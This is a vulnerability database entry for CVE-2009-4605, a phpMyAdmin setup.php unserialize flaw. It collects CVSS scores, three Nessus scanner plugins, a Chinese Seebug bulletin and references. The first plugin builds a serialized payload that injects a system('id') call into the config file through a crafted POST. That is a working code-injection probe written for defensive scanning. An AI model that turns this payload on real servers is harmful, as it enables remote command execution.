Vulnerabilities > CVE-2009-4605 - Unspecified vulnerability in PHPmyadmin
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
NONE Integrity impact
PARTIAL Availability impact
NONE Summary
scripts/setup.php (aka the setup script) in phpMyAdmin 2.11.x before 2.11.10 calls the unserialize function on the values of the (1) configuration and (2) v[0] parameters, which might allow remote attackers to conduct cross-site request forgery (CSRF) attacks via unspecified vectors.
Vulnerable Configurations
Nessus
NASL family CGI abuses NASL id PHPMYADMIN_PMASA_2010_3.NASL description The setup script included with the version of phpMyAdmin installed on the remote host does not properly sanitize user-supplied input before using it to generate a config file for the application. Submitting a specially crafted POST request can result in arbitrary PHP code injection. A remote attacker could exploit this issue in a cross-site request forgery attack, which could be used to execute arbitrary commands on the system with the privileges of the web server. last seen 2020-06-01 modified 2020-06-02 plugin id 44324 published 2010-01-27 reporter This script is Copyright (C) 2010-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/44324 title phpMyAdmin setup.php unserialize() Arbitrary PHP Code Execution (PMASA-2010-3) code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(44324); script_version("1.10"); script_cvs_date("Date: 2018/11/15 20:50:18"); script_cve_id("CVE-2009-4605"); script_bugtraq_id(37861); script_xref(name:"Secunia", value:"38211"); script_name(english:"phpMyAdmin setup.php unserialize() Arbitrary PHP Code Execution (PMASA-2010-3)"); script_summary(english:"Checks if code can be injected into the config file"); script_set_attribute( attribute:"synopsis", value: "The remote web server contains a PHP application that may allow execution of arbitrary code." ); script_set_attribute( attribute:"description", value: "The setup script included with the version of phpMyAdmin installed on the remote host does not properly sanitize user-supplied input before using it to generate a config file for the application. Submitting a specially crafted POST request can result in arbitrary PHP code injection. A remote attacker could exploit this issue in a cross-site request forgery attack, which could be used to execute arbitrary commands on the system with the privileges of the web server." ); script_set_attribute(attribute:"see_also", value:"https://www.phpmyadmin.net/security/PMASA-2010-3/"); script_set_attribute(attribute:"solution", value:"Upgrade to phpMyAdmin 2.11.10 / 3.0.0 or later."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required"); script_set_attribute(attribute:"exploit_available", value:"false"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2010/01/15"); script_set_attribute(attribute:"patch_publication_date", value:"2010/01/15"); script_set_attribute(attribute:"plugin_publication_date", value:"2010/01/27"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:phpmyadmin:phpmyadmin"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"CGI abuses"); script_copyright(english:"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc."); script_dependencies("phpMyAdmin_detect.nasl"); script_exclude_keys("Settings/disable_cgi_scanning"); script_require_ports("Services/www", 80); script_require_keys("www/phpMyAdmin", "www/PHP"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("http.inc"); include("webapp_func.inc"); include("url_func.inc"); port = get_http_port(default:80, php:TRUE); install = get_install_from_kb(appname:'phpMyAdmin', port:port, exit_on_fail:TRUE); # The first request makes sure the page exists, the PMA config is writeable, # and extracts the token url = install['dir']+'/scripts/setup.php'; res = http_send_recv3(method:"GET", item:url, port:port, exit_on_fail:TRUE); # If the config can't be written to disk, this cannot be exploited - even # if the software is unpatched. In which case, only continue if paranoid. if ('Can not load or save configuration' >< res[2]) { if (report_paranoia < 2) exit(1, 'The phpMyAdmin install at '+build_url(qs:install['dir']+'/', port:port)+' might be unpatched, but cannot be exploited.'); else config_writeable = FALSE; } else config_writeable = TRUE; # Extract the token. token = NULL; pat = 'input type="hidden" name="token" value="([^"]+)"'; match = eregmatch(string:res[2], pattern:pat); if (match) token = match[1]; else exit(1, "Unable to extract token from "+build_url(qs:url, port:port)); # The second request determines if PHP code can be injected into the config file cmd = 'id'; array_name = "TNS"; inj_code = SCRIPT_NAME+"'] = "+unixtime()+"; system('"+cmd+"'); //"; expected_out = "$cfg['Servers'][$i]['"+array_name+"']['" + inj_code; config= 'a:1:{'+ 's:7:"Servers";'+ 'a:1:{'+ 'i:0;'+ 'a:1:{'+ 's:'+strlen(array_name)+':"'+array_name+'";'+ 'a:1:{'+ 's:'+strlen(inj_code)+':"'+inj_code+'";'+ 's:0:"";'+ '}'+ '}'+ '}'+ '}'; postdata = 'token='+token+'&'+ 'action=download&'+ 'configuration='+urlencode(str:config); res = http_send_recv3( method:"POST", item:url, port:port, data:postdata, content_type:"application/x-www-form-urlencoded", exit_on_fail:TRUE ); if (expected_out >< res[2]) { if (!config_writeable) { report = '\nEven though the software is unpatched, the web server does not\n'+ 'have permission to write the configuration file to disk, which\n'+ 'means the vulnerability cannot be exploited at this time.\n'; security_hole(port:port, extra:report); } else security_hole(port); } else { full_url = build_url(qs:install['dir']+'/', port:port); exit(0, 'The phpMyAdmin install at '+full_url+' is not affected.'); }NASL family SuSE Local Security Checks NASL id SUSE_11_0_PHPMYADMIN-091209.NASL description The use of unserialize() on POST data which could have lead to remote code execution (CVE-2009-4605) has been fixed as well as some minor temporary file issues (CVE-2008-7251, CVE-2008-7252). last seen 2020-06-01 modified 2020-06-02 plugin id 44044 published 2010-01-18 reporter This script is Copyright (C) 2010-2019 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/44044 title openSUSE Security Update : phpMyAdmin (phpMyAdmin-1801) code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from openSUSE Security Update phpMyAdmin-1801. # # The text description of this plugin is (C) SUSE LLC. # include("compat.inc"); if (description) { script_id(44044); script_version("1.11"); script_cvs_date("Date: 2019/10/25 13:36:34"); script_cve_id("CVE-2008-7251", "CVE-2008-7252", "CVE-2009-4605"); script_name(english:"openSUSE Security Update : phpMyAdmin (phpMyAdmin-1801)"); script_summary(english:"Check for the phpMyAdmin-1801 patch"); script_set_attribute( attribute:"synopsis", value:"The remote openSUSE host is missing a security update." ); script_set_attribute( attribute:"description", value: "The use of unserialize() on POST data which could have lead to remote code execution (CVE-2009-4605) has been fixed as well as some minor temporary file issues (CVE-2008-7251, CVE-2008-7252)." ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.novell.com/show_bug.cgi?id=559569" ); script_set_attribute( attribute:"solution", value:"Update the affected phpMyAdmin package." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:phpMyAdmin"); script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:11.0"); script_set_attribute(attribute:"patch_publication_date", value:"2009/12/09"); script_set_attribute(attribute:"plugin_publication_date", value:"2010/01/18"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2010-2019 Tenable Network Security, Inc."); script_family(english:"SuSE Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/SuSE/release", "Host/SuSE/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/SuSE/release"); if (isnull(release) || release =~ "^(SLED|SLES)") audit(AUDIT_OS_NOT, "openSUSE"); if (release !~ "^(SUSE11\.0)$") audit(AUDIT_OS_RELEASE_NOT, "openSUSE", "11.0", release); if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); flag = 0; if ( rpm_check(release:"SUSE11.0", reference:"phpMyAdmin-2.11.9.6-0.3") ) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get()); else security_hole(0); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "phpMyAdmin"); }NASL family Debian Local Security Checks NASL id DEBIAN_DSA-2034.NASL description Several vulnerabilities have been discovered in phpMyAdmin, a tool to administer MySQL over the web. The Common Vulnerabilities and Exposures project identifies the following problems : - CVE-2008-7251 phpMyAdmin may create a temporary directory, if the configured directory does not exist yet, with insecure filesystem permissions. - CVE-2008-7252 phpMyAdmin uses predictable filenames for temporary files, which may lead to a local denial of service attack or privilege escalation. - CVE-2009-4605 The setup.php script shipped with phpMyAdmin may unserialize untrusted data, allowing for cross site request forgery. last seen 2020-06-01 modified 2020-06-02 plugin id 45556 published 2010-04-19 reporter This script is Copyright (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/45556 title Debian DSA-2034-1 : phpmyadmin - several vulnerabilities code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Debian Security Advisory DSA-2034. The text # itself is copyright (C) Software in the Public Interest, Inc. # include("compat.inc"); if (description) { script_id(45556); script_version("1.12"); script_cvs_date("Date: 2019/08/02 13:32:22"); script_cve_id("CVE-2008-7251", "CVE-2008-7252", "CVE-2009-4605"); script_bugtraq_id(37826); script_xref(name:"DSA", value:"2034"); script_name(english:"Debian DSA-2034-1 : phpmyadmin - several vulnerabilities"); script_summary(english:"Checks dpkg output for the updated package"); script_set_attribute( attribute:"synopsis", value:"The remote Debian host is missing a security-related update." ); script_set_attribute( attribute:"description", value: "Several vulnerabilities have been discovered in phpMyAdmin, a tool to administer MySQL over the web. The Common Vulnerabilities and Exposures project identifies the following problems : - CVE-2008-7251 phpMyAdmin may create a temporary directory, if the configured directory does not exist yet, with insecure filesystem permissions. - CVE-2008-7252 phpMyAdmin uses predictable filenames for temporary files, which may lead to a local denial of service attack or privilege escalation. - CVE-2009-4605 The setup.php script shipped with phpMyAdmin may unserialize untrusted data, allowing for cross site request forgery." ); script_set_attribute( attribute:"see_also", value:"https://security-tracker.debian.org/tracker/CVE-2008-7251" ); script_set_attribute( attribute:"see_also", value:"https://security-tracker.debian.org/tracker/CVE-2008-7252" ); script_set_attribute( attribute:"see_also", value:"https://security-tracker.debian.org/tracker/CVE-2009-4605" ); script_set_attribute( attribute:"see_also", value:"https://www.debian.org/security/2010/dsa-2034" ); script_set_attribute( attribute:"solution", value: "Upgrade the phpmyadmin package. For the stable distribution (lenny), these problems have been fixed in version phpmyadmin 2.11.8.1-5+lenny4." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:phpmyadmin"); script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:5.0"); script_set_attribute(attribute:"patch_publication_date", value:"2010/04/17"); script_set_attribute(attribute:"plugin_publication_date", value:"2010/04/19"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Debian Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l"); exit(0); } include("audit.inc"); include("debian_package.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); if (!get_kb_item("Host/Debian/release")) audit(AUDIT_OS_NOT, "Debian"); if (!get_kb_item("Host/Debian/dpkg-l")) audit(AUDIT_PACKAGE_LIST_MISSING); flag = 0; if (deb_check(release:"5.0", prefix:"phpmyadmin", reference:"2.11.8.1-5+lenny4")) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get()); else security_hole(0); exit(0); } else audit(AUDIT_HOST_NOT, "affected");
Seebug
| bulletinFamily | exploit |
| description | BUGTRAQ ID: 37861 CVE(CAN) ID: CVE-2009-4605 phpMyAdmin是用PHP编写的工具,用于通过WEB管理MySQL。 phpMyAdmin使用了传送给scripts/setup.php脚本的configuration和v[0]输入参数来调用unserialize函数,远程攻击者可以通过提交恶意请求执行跨站请求伪造攻击,以其他用户的权限执行任意指令。 phpMyAdmin 2.11.x 厂商补丁: phpMyAdmin ---------- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://www.phpmyadmin.net/ |
| id | SSV:18972 |
| last seen | 2017-11-19 |
| modified | 2010-01-21 |
| published | 2010-01-21 |
| reporter | Root |
| title | phpMyAdmin unserialize()调用跨站请求伪造漏洞 |
References
- http://lists.opensuse.org/opensuse-security-announce/2010-01/msg00007.html
- http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin/branches/QA_2_11/phpMyAdmin/scripts/setup.php?r1=13149&r2=13148&pathrev=13149
- http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin?view=rev&revision=13149
- http://secunia.com/advisories/38211
- http://secunia.com/advisories/39503
- http://www.debian.org/security/2010/dsa-2034
- http://www.phpmyadmin.net/home_page/security/PMASA-2010-3.php
- http://www.vupen.com/english/advisories/2010/0910